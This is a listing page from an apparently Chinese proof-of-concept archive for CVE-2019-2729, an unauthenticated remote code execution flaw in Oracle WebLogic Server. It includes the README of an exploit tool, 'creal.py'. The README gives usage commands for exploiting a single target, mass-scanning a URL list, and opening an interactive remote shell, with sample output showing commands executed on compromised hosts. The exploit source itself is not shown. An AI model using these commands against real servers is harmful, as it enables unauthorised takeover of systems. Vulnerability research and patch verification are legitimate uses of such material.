Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-2729 PoC — Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞

Source
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞 (CVE-2019-2729)
Description:Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
PoC for exploiting CVE-2019-2729 on WebLogic
Readme
# CVE-2019-2729 - creal

PoC for exploiting CVE-2019-2729 on WebLogic

### Exploit Usage

```
python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect
  ```
  

#### Exploit single target:
```
$ python3 creal.py -u http://IP:PORT -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)
```



#### Exploit url list
```
$ python3 creal.py -f list.txt -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

[-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
[!] There was an error connecting!

--------------------------
Vulnerable targets scanned:
[+] http://xxx.xxx.xxx.xxx:xxxx
```



#### Interactive shell
```
$ python3 creal.py -s http://IP:PORT

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER

> id
uid=500(UID) gid=500(GID) groups=500(GROUP)

> whoami
USER

> which nc
/usr/bin/nc
```
File Snapshot

[4.0K] /data/pocs/2dde2a3c4a0ef0c6b884dea7e65fc4a7a4b915f8 ├── [1.3M] creal.py └── [1.6K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →